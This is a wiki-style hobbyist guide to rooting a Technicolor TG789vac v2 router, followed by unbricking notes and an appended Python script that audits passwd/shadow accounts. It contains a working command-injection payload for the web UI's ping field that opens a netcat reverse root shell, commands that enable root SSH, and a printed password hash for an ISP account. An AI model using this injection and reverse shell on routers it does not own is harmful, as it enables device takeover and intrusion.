====== Rooting the router Technicolor TG789vac v2 ======

This **DSL/FTTH home router** runs **OpenWRT**; it can be **rooted** with a few simple commands. I tested the following procedure on a model shipped by **Tiscali**, an Italian service provider.

^ Product Vendor | Technicolor |
^ Product Name | MediaAccess TG789vac v2 |
^ Software Version | 16.3 |
^ Firmware Version | 16.3.7636-2921002-20170419153951 |
^ Bootloader Version | 2.0.85 |
^ Hardware Version | VANT-6 |

The router default IP address is **192.168.1.1** (beware that it has a DHCP server enabled); web access is with the **admin** login and **admin** password.

You need a PC connected on the same LAN (I used a GNU/Linux box). Issue the following command on the PC:

<code>
nc -lvvp 1025
</code>

This binds **TCP port 1025** and **starts listening** for an incoming connection. On the router, navigate to the **Diagnostics** tile, then to the **Ping & Traceroute** tab. Inside the **IP Address** text input, write the following command just before clicking the **Send Ping Request** button:

<code>
:::::::;nc 192.168.1.46 1025 -e /bin/sh
</code>

The **IP address** must be the one of your PC. On the PC you will get a **root shell**. Use the **passwd** command to change the root password:

<code>
passwd
Changing password for root
New password: MySecret
Retype password: MySecret
Password for root changed by root
</code>

Finally you have to **permanently enable SSH access for the root user** (but only from the LAN interface); copy and paste the following commands exactly:

<code>
sed -i.save 's#root:/bin/false#root:/bin/ash#' /etc/passwd
sed -i.save 's/0/1/' /etc/config/dropbear
sed -i 's/off/on/' /etc/config/dropbear
sed -i "s/wan/lan/" /etc/config/dropbear
/etc/init.d/dropbear restart
</code>

===== OpenWRT =====

The installed OpenWRT will fetch packages from this URL: **%%http://downloads.openwrt.org/chaos_calmer/15.05.1/brcm63xx-tch/VANTF/packages/Packages.gz%%**, which indeed returns a **Not Found** error.
===== The Tiscali Backdoor =====

Once you have SSH access to the router, you can confirm that there is a **Tiscali backdoor**: just look at the **/etc/passwd** file:

<code>
tiscali:x:550:550:tiscali:/home/tiscali:/usr/bin/restricted-clash
</code>

and at the **/etc/shadow** one:

<code>
tiscali:$1$CEK1lG1Q$bcHMHT6KEzDvKJ8ODFyCB0:17275:0:99999:7:::
</code>

The password is unknown, but it is a high security risk to have that account enabled on the WAN side (as the Dropbear SSH server was, by default). Tiscali surely knows that password, and maybe some bad guy has already cracked it, but you are not able to change or disable it. This is enough to justify your right to have root privileges, and to use them to lock down the Tiscali backdoor:

<code>
passwd -l tiscali
</code>

===== Router Bricked =====

I succeeded in bricking this router, maybe after I installed the **openvpn** package, which required the **kmod-tun** one. I mixed packages from different architectures and sources, so probably I got some unworkable mix. It is probable that my customization went into the overlay partition and the boot partition is still good, but unfortunately I don't know any method to clean or format the overlay. I tried some recovery procedures, without success.

=== Flash a new firmware via TFTP ===

**Power off**, keep the **reset switch pressed** and **power on**. This method can be used to start the **bootp** procedure, which can load and flash the stock firmware from a TFTP server. I did that: it seems that the firmware is loaded, because the TFTP server logs the activity and I can see the network traffic. But the router did not revive; I think that the overlay partition is still messed up and the router cannot boot properly.

=== Factory reset ===

With the router powered on and fully booted, **press the reset switch** for 7 seconds or more (someone says 20). The router should erase custom data and restart.
Unfortunately this does not work for me, maybe because the router is so messed up that the reset procedure does not even start.

=== Accessing the serial line ===

I connected a serial adapter (3.3 V) to the **J5** tag, soldering three wires to it. The **TX** and **RX** lines correspond to the **R327** and **R328** resistors. I connected the three pins to a serial-to-USB adapter, using Minicom at **115200 8N1**. The serial console is displayed, but it is in read-only mode: no input is accepted.

<code>
Technicolor Gateway (c) 2015, All rights reserved
Decompressing Bootloader................................
Gateway initialization sequence started
Boot Loader Version : 2.0.85
CPU : BCM63168-D0
RAM : 256MB
Flash : 128MB NAND, blocksize=128KB, pagesize=2048B
Board Mnemonic : VANT-6
Market ID : FFFC
External switch id = 53125
Booting : Bank 1
Magic packet :
SW Version : 0.0.0.0.0
Starting the Linux kernel
[ 0.000000] Initializing cgroup subsys cpu
[ 0.000000] Linux version 3.4.11-rt19 (repowrt-builder@d0b3de64c70c) (gcc version 4.6.4 (OpenWrt/Linaro GCC 4.6-2013.05 r49389) ) #1 SMP PREEMPT Thu Mar 9 02:28:17 UTC 2017
[ 0.000000] VANT-6 prom init
[ 0.000000] CPU revision is: 0002a080 (Broadcom BMIPS4350)
</code>

=== Forcing a bank switch ===

Someone says that this Technicolor router has **two memory banks** to store (flash) the firmware.

  * In normal conditions, the router boots from bank_1.
  * Flashing via **TFTP** will write to **bank_1** only. It will do so even if the active bank is currently bank_2. It will never set bank_1 as active.
  * You can see which is the **active bank** by reading **/proc/banktable/active** or by reading the **serial console** output during bootstrap.
  * Whenever the Gateway **fails to load the firmware image three times** in a row from the active bank, the bootloader will enter Bootfail mode and will try booting from the inactive/passive bank, without setting it as active.
  * To **force the switchover** from one bank to the other, you have to run a command like **echo bank_1 > /proc/banktable/active** as root.

So I imagine at least two methods to force the router to boot from the other bank:

  - Load a bad image via TFTP flashing (e.g. by disconnecting the cable during the upload, or by powering the router off during the flash). I did not try it.
  - Force some **memory read errors** during bootstrap. This can be accomplished by connecting the **RE#** line (pin 8) of the TSOP chip to ground for some short times during bootstrap. This was **[[https://www.ilpuntotecnico.com/forum/index.php/topic,77981.msg238958.html#msg238958|reported to work by some users]]**.

{{tg789vac_v2_tsop-pinout.jpg?200|TSOP pinout}}

===== Credits and Web References =====

  * **[[https://www.paolo9785.com/it/art/90/technicolor-tg789vac-v2-come-ablitare-root-ed-ssh|Technicolor TG789vac V2: come ablitare "root" ed SSH]]**
  * **[[https://alastair.d-silva.org/technicolor-tg789vac-v2-root-access|Technicolor TG789vac V2 Root Access]]**
  * **[[https://pietrotti97.com/pagine/router/mod-fw/2018/08/05/AGTOT-FW.html|Firmware per TG789Vac-v2]]**
  * **[[https://hack-technicolor.readthedocs.io/en/stable/Repository/|Firmware Repository]]**
  * **[[https://hack-technicolor.readthedocs.io/en/stable/Recovery/|Hacking Technicolor Gateways]]**
  * **[[https://www.crc.id.au/hacking-the-technicolor-tg799vac-and-unlocking-features/|Hacking the Technicolor TG799vac]]**
  * **[[https://www.ilpuntotecnico.com/forum/index.php/topic,77981.msg238958.html#msg238958|TG789vac v2 iiNET/UNO Flash, Sblocco e Modding]]**
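Going back to the Tiscali backdoor section: the check I did by eye on **/etc/passwd** and **/etc/shadow** can be scripted, so that every login-capable account that is not on an allow list is reported, and so that the effect of ''passwd -l'' (a ''!'' in front of the hash) is recognised as a lock. The following is an added example, not code from this page or from the firmware; the sample lines are constructed, except the two ''tiscali'' lines, which are the ones shown above, and the root hash is a placeholder. Function names are hypothetical.

```python
"""Audit passwd/shadow for accounts that can authenticate.

Added example, not code from the original page or the router firmware.
An account is reported when its shell is not a nologin shell AND its
shadow field holds a real hash (not empty, '*' or '!'). A hash starting
with '!' is what `passwd -l` leaves behind, and is classified as 'locked'.
Sample data is constructed; the tiscali lines are the ones on the page,
the root hash is a placeholder.
"""

NOLOGIN_SHELLS = {"/bin/false", "/sbin/nologin", "/usr/sbin/nologin"}

# Constructed sample files (hypothetical root hash, page's tiscali lines).
PASSWD = """root:x:0:0:root:/root:/bin/ash
daemon:x:1:1:daemon:/var:/bin/false
nobody:x:65534:65534:nobody:/var:/bin/false
tiscali:x:550:550:tiscali:/home/tiscali:/usr/bin/restricted-clash
"""
SHADOW = """root:$1$PLACEHOLDER$CONSTRUCTEDHASH:17275:0:99999:7:::
daemon:*:0:0:99999:7:::
nobody:*:0:0:99999:7:::
tiscali:$1$CEK1lG1Q$bcHMHT6KEzDvKJ8ODFyCB0:17275:0:99999:7:::
"""


def parse_colon_file(text: str) -> dict:
    """Map user name -> list of fields for a passwd- or shadow-style file."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        entries[fields[0]] = fields
    return entries


def hash_state(hash_field: str) -> str:
    """Classify a shadow password field: 'none', 'locked' or 'set'."""
    if hash_field in ("", "*", "!", "!!"):
        return "none"
    if hash_field.startswith("!"):
        return "locked"
    return "set"


def login_capable_accounts(passwd_text: str, shadow_text: str,
                           expected=("root",)) -> list:
    """Return (user, uid, shell, state) for every account that has a login
    shell and a usable hash and is not in the expected allow list."""
    passwd = parse_colon_file(passwd_text)
    shadow = parse_colon_file(shadow_text)
    findings = []
    for user, fields in passwd.items():
        uid, shell = int(fields[2]), fields[6]
        if shell in NOLOGIN_SHELLS:
            continue
        state = hash_state(shadow.get(user, [user, ""])[1])
        if state == "set" and user not in expected:
            findings.append((user, uid, shell, state))
    return findings


def lock_in_shadow(shadow_text: str, user: str) -> str:
    """Return shadow_text with `user`'s hash prefixed by '!', which is the
    change `passwd -l user` makes; used here to verify the lock is detected."""
    out = []
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if fields[0] == user and hash_state(fields[1]) == "set":
            fields[1] = "!" + fields[1]
        out.append(":".join(fields))
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    for finding in login_capable_accounts(PASSWD, SHADOW):
        print("unexpected login-capable account:", finding)
    print("after passwd -l tiscali:",
          login_capable_accounts(PASSWD, lock_in_shadow(SHADOW, "tiscali")))
```

On the router itself, once you have the root shell, the same functions can be fed the real files with ''login_capable_accounts(open('/etc/passwd').read(), open('/etc/shadow').read())''; the allow list should contain only the accounts you created yourself.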